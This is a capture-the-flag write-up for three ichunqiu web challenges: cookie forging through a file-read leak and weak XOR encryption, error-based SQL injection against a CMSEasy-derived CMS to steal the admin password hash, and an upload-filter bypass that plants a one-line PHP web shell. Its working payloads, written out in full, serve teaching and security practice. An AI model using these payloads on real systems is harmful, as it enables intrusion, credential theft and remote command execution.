REFERENCES: http://bbs.ichunqiu.com/thread-11493-1-1.html

COMPETITION: http://www.ichunqiu.com/racing/ctf_54791

Code

Got the URL game.ichunqiu.com/index.php?jpg=hei.jpg. Inspect the source code, we can see the data is encoded to base64.

Obviously, index.php reads the file we passed in and encode it to base64, and use data: protocol to show. Trying to read the index.php source: game.ichunqiu.com/index.php?jpg=index.php.

<title>file:index.php</title><img src='data:image/gif;base64,PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KaGVhZGVyKCdjb250ZW50LXR5cGU6dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgnKTsNCmlmKCEgaXNzZXQoJF9HRVRbJ2pwZyddKSkNCiAgICBoZWFkZXIoJ1JlZnJlc2g6MDt1cmw9Li9pbmRleC5waHA/anBnPWhlaS5qcGcnKTsNCiRmaWxlID0gJF9HRVRbJ2pwZyddOw0KZWNobyAnPHRpdGxlPmZpbGU6Jy4kZmlsZS4nPC90aXRsZT4nOw0KJGZpbGUgPSBwcmVnX3JlcGxhY2UoIi9bXmEtekEtWjAtOS5dKy8iLCIiLCAkZmlsZSk7DQokZmlsZSA9IHN0cl9yZXBsYWNlKCJjb25maWciLCJfIiwgJGZpbGUpOw0KJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsNCg0KZWNobyAiPGltZyBzcmM9J2RhdGE6aW1hZ2UvZ2lmO2Jhc2U2NCwiLiR0eHQuIic+PC9pbWc+IjsNCg0KLyoNCiAqIENhbiB5b3UgZmluZCB0aGUgZmxhZyBmaWxlPw0KICoNCiAqLw0KDQo/Pg=='></img>

Decode the base64 part:

<?php
/**
 * Created by PhpStorm.
 * Date: 2015/11/16
 * Time: 1:31
 */
header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
    header('Refresh:0;url=./index.php?jpg=hei.jpg');
$file = $_GET['jpg'];
echo '<title>file:'.$file.'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
$file = str_replace("config","_", $file);
$txt = base64_encode(file_get_contents($file));

echo "<img src='data:image/gif;base64,".$txt."'></img>";

/*
 * Can you find the flag file?
 *
 */

?>

It proves. The index.php got the file name, and remove the non-alphabet and non-number characters. If it contains 'config', it will be replaced to '_'.

And we can see the file is created by PhpStorm. So it may contains .idea directory. Access game.ichunqiu.com/.idea/workspace.xml we can see there are 3 files:

We can't bypass it to access the file config.php, so we only can access the file fl3g_ichuqiu.php, because of the index.php will replace the characters, so we can access the URL game.ichunqiu.com/index.php?jpg=fl3gconfigichuqiu.php.

<?php
/**
 * Created by PhpStorm.
 * Date: 2015/11/16
 * Time: 1:31
 */
error_reporting(E_ALL || ~E_NOTICE);
include('config.php');
function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++)	{
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}

function encrypt($txt,$key){
    for($i=0;$i<strlen($txt);$i++){
        $tmp .= chr(ord($txt[$i])+10);
    }
    $txt = $tmp;
    $rnd=random(4);
    $key=md5($rnd.$key);
    $s=0;
    for($i=0;$i<strlen($txt);$i++){
        if($s == 32) $s = 0;
        $ttmp .= $txt[$i] ^ $key[++$s];
    }
    return base64_encode($rnd.$ttmp);
}
function decrypt($txt,$key){
    $txt=base64_decode($txt);
    $rnd = substr($txt,0,4);
    $txt = substr($txt,4);
    $key=md5($rnd.$key);

    $s=0;
    for($i=0;$i<strlen($txt);$i++){
        if($s == 32) $s = 0;
        $tmp .= $txt[$i]^$key[++$s];
    }
    for($i=0;$i<strlen($tmp);$i++){
        $tmp1 .= chr(ord($tmp[$i])-10);
    }
    return $tmp1;
}
$username = decrypt($_COOKIE['user'],$key);
if ($username == 'system'){
    echo $flag;
}else{
    setcookie('user',encrypt('guest',$key));
    echo "╮(╯▽╰)╭";
}
?>

And we can see when the cookies decrypt to 'system' we can get the flag. So we can use the cookies to get the $key, and try to calculate the cookies.

<?php
function decrypt($origin, $cookies) {
    
    // Decrypt the key
    for ($i=0; $i<strlen($origin); $i++){
        $tmp .= chr(ord($origin[$i])+10);
    }
    $origin = $tmp;
    $txt = base64_decode($cookies);
    $rnd = substr($txt, 0, 4);
    $txt = substr($txt, 4);
    for ($i=0;$i<strlen($txt);$i++){
        $key .= $txt[$i] ^ $origin[$i];
    }

    // Get the cookies
    $ans = 'system';
    $tmp = '';
    for ($i=0; $i<strlen($ans); $i++) {
        $tmp .= chr(ord($ans[$i])+10);
    }
    $txt = $tmp;

    // 'system' is longer than 'guest', so add a char to key
    $base = '0123456789abcdef';
    for ($t=0; $t<16; $t++) {
        $tmp = $key.$base[$t];
        for ($i=0; $i<strlen($txt); $i++) {
            $res .= $txt[$i] ^ $tmp[$i];
        }
        file_put_contents('1.txt', base64_encode($rnd . $res).'\r\n', FILE_APPEND);
        $res = '';
    }
}

echo decrypt('guest', '');

Access game.ichunqiu.com/fl3g_ichuqiu.php, and use burp to intercept the request to get the cookies.

Get the cookies and calc the new cookies.

SXJxVhvgRBwLRw==
SXJxVhvgRBwLRg==
SXJxVhvgRBwLRQ==
SXJxVhvgRBwLRA==
SXJxVhvgRBwLQw==
SXJxVhvgRBwLQg==
SXJxVhvgRBwLQQ==
SXJxVhvgRBwLQA==
SXJxVhvgRBwLTw==
SXJxVhvgRBwLTg==
SXJxVhvgRBwLFg==
SXJxVhvgRBwLFQ==
SXJxVhvgRBwLFA==
SXJxVhvgRBwLEw==
SXJxVhvgRBwLEg==
SXJxVhvgRBwLEQ==

Send the request to intruder, and load the new cookies to exploit.

Get the flag flag{78da28b9-d240-4a01-b3a0-2dc34b0b1067}.

YeserCMS

Look around the website. We find the 'YeserCMS' is an edition of 'CMSEasy'. So try to search for the vulnerability of CMSEasy. And there is one we can use: http://wooyun.com.com.sb/static/bugs/wooyun-2015-0137013.html.

It was caused by celive/live/header.php. We can construct a payload to get the admin user and password hash.

There is an example in the wooyun site:

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520cmseasy_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>

And we get the error message:

Table 'Yeser.cmseasy_user' doesn't exist

So, change the table name from 'cmseasy_user' to 'yesercms_user' in the payload. Because of the limit of length it can show, we should use the payload twice to get the full password hash.

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520yesercms_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520yesercms_user%2529%252C8%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>

And get the username and password hash:

admin|ff512d4240cbbdeafada404677ccbe61

The username and password is:

admin|Yeser231

Login to the admin system. And look around to find an entrance to read any file.

Click 'Edit', and intercept it, modify the path to flag, and get the flag.

The flag is flag{97ad55e7-f261-495a-8cb7-60b10dc20ab7}

Upload

Only a upload form in the page, so try upload a file. And when it upload successfully, you can get the stored path.

But it will delete the <? and php characters, so uploads the script file directly will not work.

(There is something wrong when uploading php file, sometimes successes, sometimes fails.)

If upload php file fails, you should upload other executable script format, such as php5, php7, phtml, pht and so on. This system don't forbid the pht format, so change the extension to pht to upload script.

If successes, you should bypass the filtering <? and php. Below php7, we can use another form to execute php scripts.

<script language="pHp">...</script>

So, construct a payload:

<script language="pHp">echo `$_REQUEST[v]`;</script>

or

<script language="pHp">require_once("$_GET[v]");</script>

The first payload, we can first get the current working directory, using v=pwd, get the directory is /var/www/html/u, so we can cat the flag using v=cat /var/www/html/flag.php.

And got the flag:

The second payload, we can directly using php filter to get the file contents.

Decode it.

The flag is flag{63dbb634-654c-4ff9-a091-658ec692d417}.